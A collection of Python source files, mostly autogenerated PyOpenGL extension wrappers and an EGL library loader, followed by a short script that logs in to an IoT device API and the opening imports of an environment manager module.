from OpenGL.raw.GLES2.EXT.read_format_bgra import _EXTENSION_NAME
def glInitReadFormatBgraEXT():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/EXT/sRGB_write_control.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.EXT.sRGB_write_control import *
from OpenGL.raw.GLES2.EXT.sRGB_write_control import _EXTENSION_NAME
def glInitSrgbWriteControlEXT():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/EXT/unpack_subimage.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.EXT.unpack_subimage import *
from OpenGL.raw.GLES2.EXT.unpack_subimage import _EXTENSION_NAME
def glInitUnpackSubimageEXT():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/IMG/texture_compression_pvrtc.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.IMG.texture_compression_pvrtc import *
from OpenGL.raw.GLES2.IMG.texture_compression_pvrtc import _EXTENSION_NAME
def glInitTextureCompressionPvrtcIMG():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/KHR/blend_equation_advanced.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.KHR.blend_equation_advanced import *
from OpenGL.raw.GLES2.KHR.blend_equation_advanced import _EXTENSION_NAME
def glInitBlendEquationAdvancedKHR():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/KHR/no_error.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.KHR.no_error import *
from OpenGL.raw.GLES2.KHR.no_error import _EXTENSION_NAME
def glInitNoErrorKHR():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/KHR/robust_buffer_access_behavior.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.KHR.robust_buffer_access_behavior import *
from OpenGL.raw.GLES2.KHR.robust_buffer_access_behavior import _EXTENSION_NAME
def glInitRobustBufferAccessBehaviorKHR():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/NV/conditional_render.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.NV.conditional_render import *
from OpenGL.raw.GLES2.NV.conditional_render import _EXTENSION_NAME
def glInitConditionalRenderNV():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/NV/conservative_raster_pre_snap_triangles.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.NV.conservative_raster_pre_snap_triangles import *
from OpenGL.raw.GLES2.NV.conservative_raster_pre_snap_triangles import _EXTENSION_NAME
def glInitConservativeRasterPreSnapTrianglesNV():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/NV/framebuffer_blit.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.NV.framebuffer_blit import *
from OpenGL.raw.GLES2.NV.framebuffer_blit import _EXTENSION_NAME
def glInitFramebufferBlitNV():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/NV/polygon_mode.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.NV.polygon_mode import *
from OpenGL.raw.GLES2.NV.polygon_mode import _EXTENSION_NAME
def glInitPolygonModeNV():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/NV/read_depth_stencil.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.NV.read_depth_stencil import *
from OpenGL.raw.GLES2.NV.read_depth_stencil import _EXTENSION_NAME
def glInitReadDepthStencilNV():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/NV/shader_noperspective_interpolation.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.NV.shader_noperspective_interpolation import *
from OpenGL.raw.GLES2.NV.shader_noperspective_interpolation import _EXTENSION_NAME
def glInitShaderNoperspectiveInterpolationNV():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/NV/viewport_array2.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.NV.viewport_array2 import *
from OpenGL.raw.GLES2.NV.viewport_array2 import _EXTENSION_NAME
def glInitViewportArray2NV():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/OES/packed_depth_stencil.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.OES.packed_depth_stencil import *
from OpenGL.raw.GLES2.OES.packed_depth_stencil import _EXTENSION_NAME
def glInitPackedDepthStencilOES():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/OES/sample_shading.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.OES.sample_shading import *
from OpenGL.raw.GLES2.OES.sample_shading import _EXTENSION_NAME
def glInitSampleShadingOES():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/OES/sample_variables.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.OES.sample_variables import *
from OpenGL.raw.GLES2.OES.sample_variables import _EXTENSION_NAME
def glInitSampleVariablesOES():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/OES/texture_float_linear.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.OES.texture_float_linear import *
from OpenGL.raw.GLES2.OES.texture_float_linear import _EXTENSION_NAME
def glInitTextureFloatLinearOES():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/OES/texture_npot.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.OES.texture_npot import *
from OpenGL.raw.GLES2.OES.texture_npot import _EXTENSION_NAME
def glInitTextureNpotOES():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/QCOM/alpha_test.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.QCOM.alpha_test import *
from OpenGL.raw.GLES2.QCOM.alpha_test import _EXTENSION_NAME
def glInitAlphaTestQCOM():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GL/IBM/multimode_draw_arrays.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.IBM.multimode_draw_arrays import *
from OpenGL.raw.GL.IBM.multimode_draw_arrays import _EXTENSION_NAME
def glInitMultimodeDrawArraysIBM():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
# INPUT glMultiModeDrawArraysIBM.count size not checked against 'primcount'
# INPUT glMultiModeDrawArraysIBM.first size not checked against 'primcount'
# INPUT glMultiModeDrawArraysIBM.mode size not checked against 'primcount'
glMultiModeDrawArraysIBM=wrapper.wrapper(glMultiModeDrawArraysIBM).setInputArraySize(
'count', None
).setInputArraySize(
'first', None
).setInputArraySize(
'mode', None
)
# INPUT glMultiModeDrawElementsIBM.count size not checked against 'primcount'
# INPUT glMultiModeDrawElementsIBM.indices size not checked against 'primcount'
# INPUT glMultiModeDrawElementsIBM.mode size not checked against 'primcount'
glMultiModeDrawElementsIBM=wrapper.wrapper(glMultiModeDrawElementsIBM).setInputArraySize(
'count', None
).setInputArraySize(
'indices', None
).setInputArraySize(
'mode', None
)
### END AUTOGENERATED SECTION
```
#### File: GL/NV/gpu_program4.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.NV.gpu_program4 import *
from OpenGL.raw.GL.NV.gpu_program4 import _EXTENSION_NAME
def glInitGpuProgram4NV():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
glProgramLocalParameterI4ivNV=wrapper.wrapper(glProgramLocalParameterI4ivNV).setInputArraySize(
'params', 4
)
# INPUT glProgramLocalParametersI4ivNV.params size not checked against count*4
glProgramLocalParametersI4ivNV=wrapper.wrapper(glProgramLocalParametersI4ivNV).setInputArraySize(
'params', None
)
glProgramLocalParameterI4uivNV=wrapper.wrapper(glProgramLocalParameterI4uivNV).setInputArraySize(
'params', 4
)
# INPUT glProgramLocalParametersI4uivNV.params size not checked against count*4
glProgramLocalParametersI4uivNV=wrapper.wrapper(glProgramLocalParametersI4uivNV).setInputArraySize(
'params', None
)
glProgramEnvParameterI4ivNV=wrapper.wrapper(glProgramEnvParameterI4ivNV).setInputArraySize(
'params', 4
)
# INPUT glProgramEnvParametersI4ivNV.params size not checked against count*4
glProgramEnvParametersI4ivNV=wrapper.wrapper(glProgramEnvParametersI4ivNV).setInputArraySize(
'params', None
)
glProgramEnvParameterI4uivNV=wrapper.wrapper(glProgramEnvParameterI4uivNV).setInputArraySize(
'params', 4
)
# INPUT glProgramEnvParametersI4uivNV.params size not checked against count*4
glProgramEnvParametersI4uivNV=wrapper.wrapper(glProgramEnvParametersI4uivNV).setInputArraySize(
'params', None
)
glGetProgramLocalParameterIivNV=wrapper.wrapper(glGetProgramLocalParameterIivNV).setOutput(
'params',size=(4,),orPassIn=True
)
glGetProgramLocalParameterIuivNV=wrapper.wrapper(glGetProgramLocalParameterIuivNV).setOutput(
'params',size=(4,),orPassIn=True
)
glGetProgramEnvParameterIivNV=wrapper.wrapper(glGetProgramEnvParameterIivNV).setOutput(
'params',size=(4,),orPassIn=True
)
glGetProgramEnvParameterIuivNV=wrapper.wrapper(glGetProgramEnvParameterIuivNV).setOutput(
'params',size=(4,),orPassIn=True
)
### END AUTOGENERATED SECTION
```
#### File: GL/NV/query_resource.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.NV.query_resource import *
from OpenGL.raw.GL.NV.query_resource import _EXTENSION_NAME
def glInitQueryResourceNV():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GL/SGIS/sharpen_texture.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.SGIS.sharpen_texture import *
from OpenGL.raw.GL.SGIS.sharpen_texture import _EXTENSION_NAME
def glInitSharpenTextureSGIS():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
# INPUT glSharpenTexFuncSGIS.points size not checked against n*2
glSharpenTexFuncSGIS=wrapper.wrapper(glSharpenTexFuncSGIS).setInputArraySize(
'points', None
)
glGetSharpenTexFuncSGIS=wrapper.wrapper(glGetSharpenTexFuncSGIS).setOutput(
'points',size=_glgets._glget_size_mapping,pnameArg='target',orPassIn=True
)
### END AUTOGENERATED SECTION
```
#### File: GL/SGIX/pixel_texture.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.SGIX.pixel_texture import *
from OpenGL.raw.GL.SGIX.pixel_texture import _EXTENSION_NAME
def glInitPixelTextureSGIX():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GL/VERSION/GL_2_1.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.VERSION.GL_2_1 import *
from OpenGL.raw.GL.VERSION.GL_2_1 import _EXTENSION_NAME
def glInitGl21VERSION():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
# INPUT glUniformMatrix2x3fv.value size not checked against count*6
glUniformMatrix2x3fv=wrapper.wrapper(glUniformMatrix2x3fv).setInputArraySize(
'value', None
)
# INPUT glUniformMatrix3x2fv.value size not checked against count*6
glUniformMatrix3x2fv=wrapper.wrapper(glUniformMatrix3x2fv).setInputArraySize(
'value', None
)
# INPUT glUniformMatrix2x4fv.value size not checked against count*8
glUniformMatrix2x4fv=wrapper.wrapper(glUniformMatrix2x4fv).setInputArraySize(
'value', None
)
# INPUT glUniformMatrix4x2fv.value size not checked against count*8
glUniformMatrix4x2fv=wrapper.wrapper(glUniformMatrix4x2fv).setInputArraySize(
'value', None
)
# INPUT glUniformMatrix3x4fv.value size not checked against count*12
glUniformMatrix3x4fv=wrapper.wrapper(glUniformMatrix3x4fv).setInputArraySize(
'value', None
)
# INPUT glUniformMatrix4x3fv.value size not checked against count*12
glUniformMatrix4x3fv=wrapper.wrapper(glUniformMatrix4x3fv).setInputArraySize(
'value', None
)
### END AUTOGENERATED SECTION
```
#### File: GLX/ARB/create_context_no_error.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLX import _types, _glgets
from OpenGL.raw.GLX.ARB.create_context_no_error import *
from OpenGL.raw.GLX.ARB.create_context_no_error import _EXTENSION_NAME
def glInitCreateContextNoErrorARB():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: OpenGL/platform/egl.py
```python
import ctypes, ctypes.util
from OpenGL.platform import baseplatform, ctypesloader
class EGLPlatform( baseplatform.BasePlatform ):
"""EGL platform for opengl-es only platforms"""
@baseplatform.lazy_property
def GLES1(self):
try:
return ctypesloader.loadLibrary(
ctypes.cdll,
'GLESv1_CM', # ick
mode=ctypes.RTLD_GLOBAL
)
except OSError:
return None
@baseplatform.lazy_property
def GLES2(self):
try:
return ctypesloader.loadLibrary(
ctypes.cdll,
'GLESv2',
mode=ctypes.RTLD_GLOBAL
)
except OSError:
return None
@baseplatform.lazy_property
def GLES3(self):
# implementers guide says to use the same name for the DLL
return self.GLES2
@baseplatform.lazy_property
def GL(self):
try:
return ctypesloader.loadLibrary(
ctypes.cdll,
'GL',
mode=ctypes.RTLD_GLOBAL
)
except OSError:
return self.GLES2 or self.GLES1
@baseplatform.lazy_property
def GLU(self):
try:
return ctypesloader.loadLibrary(
ctypes.cdll,
'GLU',
mode=ctypes.RTLD_GLOBAL
)
except OSError:
return None
@baseplatform.lazy_property
def GLUT( self ):
try:
return ctypesloader.loadLibrary(
ctypes.cdll,
'glut',
mode=ctypes.RTLD_GLOBAL
)
except OSError:
return None
@baseplatform.lazy_property
def OpenGL(self): return self.GL
@baseplatform.lazy_property
def EGL(self):
# TODO: the raspberry pi crashes on trying to load EGL module
# because the EGL library requires a structure from GLES2 without
# linking to that library... Github issue is here:
# https://github.com/raspberrypi/firmware/issues/110
import os
if os.path.exists('/proc/cpuinfo'):
info = open('/proc/cpuinfo').read()
if 'BCM2708' in info or 'BCM2709' in info:
assert self.GLES2
try:
return ctypesloader.loadLibrary(
ctypes.cdll,
'EGL',
mode=ctypes.RTLD_GLOBAL
)
except OSError as err:
raise ImportError("Unable to load EGL library", *err.args)
@baseplatform.lazy_property
def getExtensionProcedure( self ):
eglGetProcAddress = self.EGL.eglGetProcAddress
eglGetProcAddress.restype = ctypes.c_void_p
return eglGetProcAddress
@baseplatform.lazy_property
def GLE( self ):
try:
return ctypesloader.loadLibrary(
ctypes.cdll,
'gle',
mode=ctypes.RTLD_GLOBAL
)
except OSError:
return None
DEFAULT_FUNCTION_TYPE = staticmethod( ctypes.CFUNCTYPE )
@baseplatform.lazy_property
def GetCurrentContext( self ):
return self.EGL.eglGetCurrentContext
```
#### File: GLES1/OES/draw_texture.py
```python
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GLES1 import _types as _cs
# End users want this...
from OpenGL.raw.GLES1._types import *
from OpenGL.raw.GLES1 import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GLES1_OES_draw_texture'
def _f( function ):
return _p.createFunction( function,_p.PLATFORM.GLES1,'GLES1_OES_draw_texture',error_checker=_errors._error_checker)
GL_TEXTURE_CROP_RECT_OES=_C('GL_TEXTURE_CROP_RECT_OES',0x8B9D)
@_f
@_p.types(None,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat)
def glDrawTexfOES(x,y,z,width,height):pass
@_f
@_p.types(None,arrays.GLfloatArray)
def glDrawTexfvOES(coords):pass
@_f
@_p.types(None,_cs.GLint,_cs.GLint,_cs.GLint,_cs.GLint,_cs.GLint)
def glDrawTexiOES(x,y,z,width,height):pass
@_f
@_p.types(None,arrays.GLintArray)
def glDrawTexivOES(coords):pass
@_f
@_p.types(None,_cs.GLshort,_cs.GLshort,_cs.GLshort,_cs.GLshort,_cs.GLshort)
def glDrawTexsOES(x,y,z,width,height):pass
@_f
@_p.types(None,arrays.GLshortArray)
def glDrawTexsvOES(coords):pass
@_f
@_p.types(None,_cs.GLfixed,_cs.GLfixed,_cs.GLfixed,_cs.GLfixed,_cs.GLfixed)
def glDrawTexxOES(x,y,z,width,height):pass
@_f
@_p.types(None,arrays.GLfixedArray)
def glDrawTexxvOES(coords):pass
```
#### File: GLES2/OES/tessellation_shader.py
```python
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GLES2 import _types as _cs
# End users want this...
from OpenGL.raw.GLES2._types import *
from OpenGL.raw.GLES2 import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GLES2_OES_tessellation_shader'
def _f( function ):
return _p.createFunction( function,_p.PLATFORM.GLES2,'GLES2_OES_tessellation_shader',error_checker=_errors._error_checker)
GL_CCW=_C('GL_CCW',0x0901)
GL_CW=_C('GL_CW',0x0900)
GL_EQUAL=_C('GL_EQUAL',0x0202)
GL_FRACTIONAL_EVEN_OES=_C('GL_FRACTIONAL_EVEN_OES',0x8E7C)
GL_FRACTIONAL_ODD_OES=_C('GL_FRACTIONAL_ODD_OES',0x8E7B)
GL_ISOLINES_OES=_C('GL_ISOLINES_OES',0x8E7A)
GL_IS_PER_PATCH_OES=_C('GL_IS_PER_PATCH_OES',0x92E7)
GL_MAX_COMBINED_TESS_CONTROL_UNIFORM_COMPONENTS_OES=_C('GL_MAX_COMBINED_TESS_CONTROL_UNIFORM_COMPONENTS_OES',0x8E1E)
GL_MAX_COMBINED_TESS_EVALUATION_UNIFORM_COMPONENTS_OES=_C('GL_MAX_COMBINED_TESS_EVALUATION_UNIFORM_COMPONENTS_OES',0x8E1F)
GL_MAX_PATCH_VERTICES_OES=_C('GL_MAX_PATCH_VERTICES_OES',0x8E7D)
GL_MAX_TESS_CONTROL_ATOMIC_COUNTERS_OES=_C('GL_MAX_TESS_CONTROL_ATOMIC_COUNTERS_OES',0x92D3)
GL_MAX_TESS_CONTROL_ATOMIC_COUNTER_BUFFERS_OES=_C('GL_MAX_TESS_CONTROL_ATOMIC_COUNTER_BUFFERS_OES',0x92CD)
GL_MAX_TESS_CONTROL_IMAGE_UNIFORMS_OES=_C('GL_MAX_TESS_CONTROL_IMAGE_UNIFORMS_OES',0x90CB)
GL_MAX_TESS_CONTROL_INPUT_COMPONENTS_OES=_C('GL_MAX_TESS_CONTROL_INPUT_COMPONENTS_OES',0x886C)
GL_MAX_TESS_CONTROL_OUTPUT_COMPONENTS_OES=_C('GL_MAX_TESS_CONTROL_OUTPUT_COMPONENTS_OES',0x8E83)
GL_MAX_TESS_CONTROL_SHADER_STORAGE_BLOCKS_OES=_C('GL_MAX_TESS_CONTROL_SHADER_STORAGE_BLOCKS_OES',0x90D8)
GL_MAX_TESS_CONTROL_TEXTURE_IMAGE_UNITS_OES=_C('GL_MAX_TESS_CONTROL_TEXTURE_IMAGE_UNITS_OES',0x8E81)
GL_MAX_TESS_CONTROL_TOTAL_OUTPUT_COMPONENTS_OES=_C('GL_MAX_TESS_CONTROL_TOTAL_OUTPUT_COMPONENTS_OES',0x8E85)
GL_MAX_TESS_CONTROL_UNIFORM_BLOCKS_OES=_C('GL_MAX_TESS_CONTROL_UNIFORM_BLOCKS_OES',0x8E89)
GL_MAX_TESS_CONTROL_UNIFORM_COMPONENTS_OES=_C('GL_MAX_TESS_CONTROL_UNIFORM_COMPONENTS_OES',0x8E7F)
GL_MAX_TESS_EVALUATION_ATOMIC_COUNTERS_OES=_C('GL_MAX_TESS_EVALUATION_ATOMIC_COUNTERS_OES',0x92D4)
GL_MAX_TESS_EVALUATION_ATOMIC_COUNTER_BUFFERS_OES=_C('GL_MAX_TESS_EVALUATION_ATOMIC_COUNTER_BUFFERS_OES',0x92CE)
GL_MAX_TESS_EVALUATION_IMAGE_UNIFORMS_OES=_C('GL_MAX_TESS_EVALUATION_IMAGE_UNIFORMS_OES',0x90CC)
GL_MAX_TESS_EVALUATION_INPUT_COMPONENTS_OES=_C('GL_MAX_TESS_EVALUATION_INPUT_COMPONENTS_OES',0x886D)
GL_MAX_TESS_EVALUATION_OUTPUT_COMPONENTS_OES=_C('GL_MAX_TESS_EVALUATION_OUTPUT_COMPONENTS_OES',0x8E86)
GL_MAX_TESS_EVALUATION_SHADER_STORAGE_BLOCKS_OES=_C('GL_MAX_TESS_EVALUATION_SHADER_STORAGE_BLOCKS_OES',0x90D9)
GL_MAX_TESS_EVALUATION_TEXTURE_IMAGE_UNITS_OES=_C('GL_MAX_TESS_EVALUATION_TEXTURE_IMAGE_UNITS_OES',0x8E82)
GL_MAX_TESS_EVALUATION_UNIFORM_BLOCKS_OES=_C('GL_MAX_TESS_EVALUATION_UNIFORM_BLOCKS_OES',0x8E8A)
GL_MAX_TESS_EVALUATION_UNIFORM_COMPONENTS_OES=_C('GL_MAX_TESS_EVALUATION_UNIFORM_COMPONENTS_OES',0x8E80)
GL_MAX_TESS_GEN_LEVEL_OES=_C('GL_MAX_TESS_GEN_LEVEL_OES',0x8E7E)
GL_MAX_TESS_PATCH_COMPONENTS_OES=_C('GL_MAX_TESS_PATCH_COMPONENTS_OES',0x8E84)
GL_PATCHES_OES=_C('GL_PATCHES_OES',0x000E)
GL_PATCH_VERTICES_OES=_C('GL_PATCH_VERTICES_OES',0x8E72)
GL_PRIMITIVE_RESTART_FOR_PATCHES_SUPPORTED_OES=_C('GL_PRIMITIVE_RESTART_FOR_PATCHES_SUPPORTED_OES',0x8221)
GL_QUADS_OES=_C('GL_QUADS_OES',0x0007)
GL_REFERENCED_BY_TESS_CONTROL_SHADER_OES=_C('GL_REFERENCED_BY_TESS_CONTROL_SHADER_OES',0x9307)
GL_REFERENCED_BY_TESS_EVALUATION_SHADER_OES=_C('GL_REFERENCED_BY_TESS_EVALUATION_SHADER_OES',0x9308)
GL_TESS_CONTROL_OUTPUT_VERTICES_OES=_C('GL_TESS_CONTROL_OUTPUT_VERTICES_OES',0x8E75)
GL_TESS_CONTROL_SHADER_BIT_OES=_C('GL_TESS_CONTROL_SHADER_BIT_OES',0x00000008)
GL_TESS_CONTROL_SHADER_OES=_C('GL_TESS_CONTROL_SHADER_OES',0x8E88)
GL_TESS_EVALUATION_SHADER_BIT_OES=_C('GL_TESS_EVALUATION_SHADER_BIT_OES',0x00000010)
GL_TESS_EVALUATION_SHADER_OES=_C('GL_TESS_EVALUATION_SHADER_OES',0x8E87)
GL_TESS_GEN_MODE_OES=_C('GL_TESS_GEN_MODE_OES',0x8E76)
GL_TESS_GEN_POINT_MODE_OES=_C('GL_TESS_GEN_POINT_MODE_OES',0x8E79)
GL_TESS_GEN_SPACING_OES=_C('GL_TESS_GEN_SPACING_OES',0x8E77)
GL_TESS_GEN_VERTEX_ORDER_OES=_C('GL_TESS_GEN_VERTEX_ORDER_OES',0x8E78)
GL_TRIANGLES=_C('GL_TRIANGLES',0x0004)
@_f
@_p.types(None,_cs.GLenum,_cs.GLint)
def glPatchParameteriOES(pname,value):pass
```
#### File: Navio2/Python/CUT.py
```python
import urllib.parse
import urllib.request
import json
def get_token():
params = urllib.parse.urlencode({"username": "eric", "password":"<PASSWORD>"}).encode()
contents = urllib.request.urlopen('http://democut3.canadaeast.cloudapp.azure.com/rest/ctcapi/v3/auth/login?' ,data=params)
data = json.loads(contents.read().decode(contents.info().get_param('charset') or 'utf-8'))
return data['token']
def create_Device():
url = 'http://democut3.canadaeast.cloudapp.azure.com/rest/ctcapi/v3/devices'
data = urllib.parse.urlencode({"deviceTypeKey": 113001, "externalId": "Test05", "name": "Test05", "serviceId": "db39fd3e-7ad5-44be-a817-01fcb608efbb", "smartObjects": [], "metas": {}}).encode()
headers = {
'x-access-token': '<KEY>'
}
req = urllib.request.Request(url, data=data)
req.add_header('x-access-token', '<KEY>')
response = urllib.request.urlopen(req)
the_page = response.read()
# req = urllib.request.Request('http://democut3.canadaeast.cloudapp.azure.com/rest/ctcapi/v3/devices?')
# token = "<KEY>"
# req.add_header('x-access-token', '<KEY>')
# contents = urllib.request.urlopen(req, data=params)
# import requests
# from requests.auth import HTTPBasicAuth
# # import json
# # # request = Request
# params = {
# "deviceTypeKey": 113001,
# "externalId": "Test01",
# "name": "Test01",
# "serviceId": "db39fd3e-7ad5-44be-a817-01fcb608efbb",
# "smartObjects": [],
# "metas": {}
# }
# # # headers =
# response = requests.post(
# url,
# data = params,
# header=('x-access-token','<KEY>'))
# # params = urllib.parse.urlencode({
# # "deviceTypeKey": 126001,
# # "externalId": "Test01",
# # "name": "Test01",
# "serviceId": "db39fd3e-7ad5-44be-a817-<KEY>",
# "smartObjects": [],
# "metas": {}
# }).encode()
# contents = urllib.request.urlopen('http://democut3.canadaeast.cloudapp.azure.com/rest/ctcapi/v3/devices', data=params)
# data = json.loads(contents.read().decode(contents.info().get_param('charset') or 'utf-8'))
return the_page
if __name__ == '__main__':
# token = get_token()
# print(token)
data = create_Device()
print(data.content)
print(data.text)
print(data.status_code)
print(data['id'])
``` |
{
"source": "5g-empower/empower-core",
"score": 2
} |
#### File: empower_core/envmanager/envmanager.py
```python
import uuid
from empower_core.walkmodule import walk_module
from empower_core.service import EService
from empower_core.envmanager.env import Env
from empower_core.envmanager.workercallbackshandler import \
WorkerCallbacksHandler
from empower_core.envmanager.workershandler import WorkersHandler
